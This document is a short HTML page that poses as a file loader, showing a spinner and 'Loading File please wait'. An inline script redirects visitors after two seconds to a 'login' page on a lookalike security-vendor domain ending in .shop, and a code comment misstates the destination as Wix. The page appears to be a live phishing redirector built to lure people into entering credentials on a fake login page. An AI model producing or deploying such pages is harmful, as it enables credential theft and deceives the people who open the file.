<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Loading...</title>
  <style>
    body {
      margin: 0;
      padding: 0;
      background-color: #3498db; /* Blue background color */
      display: flex;
      align-items: center;
      justify-content: center;
      height: 100vh;
    }

    .spinner {
      border: 4px solid rgba(255, 255, 255, 0.3);
      border-radius: 50%;
      border-top: 4px solid #ffffff; /* White spinner color */
      width: 40px;
      height: 40px;
      animation: spin 1s linear infinite;
    }

    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }
  </style>
</head>
<body>
  <div class="spinner"></div><br>&nbsp;&nbsp;<font color="white">Loading File please wait</font>
  <script>
    // Redirect to Wix after a brief delay (e.g., 3 seconds)
    setTimeout(function() {
      window.location.href = "https://login.symatec-loglistern.shop/oOnBALKK";
    }, 2000);
  </script>
</body>
</html>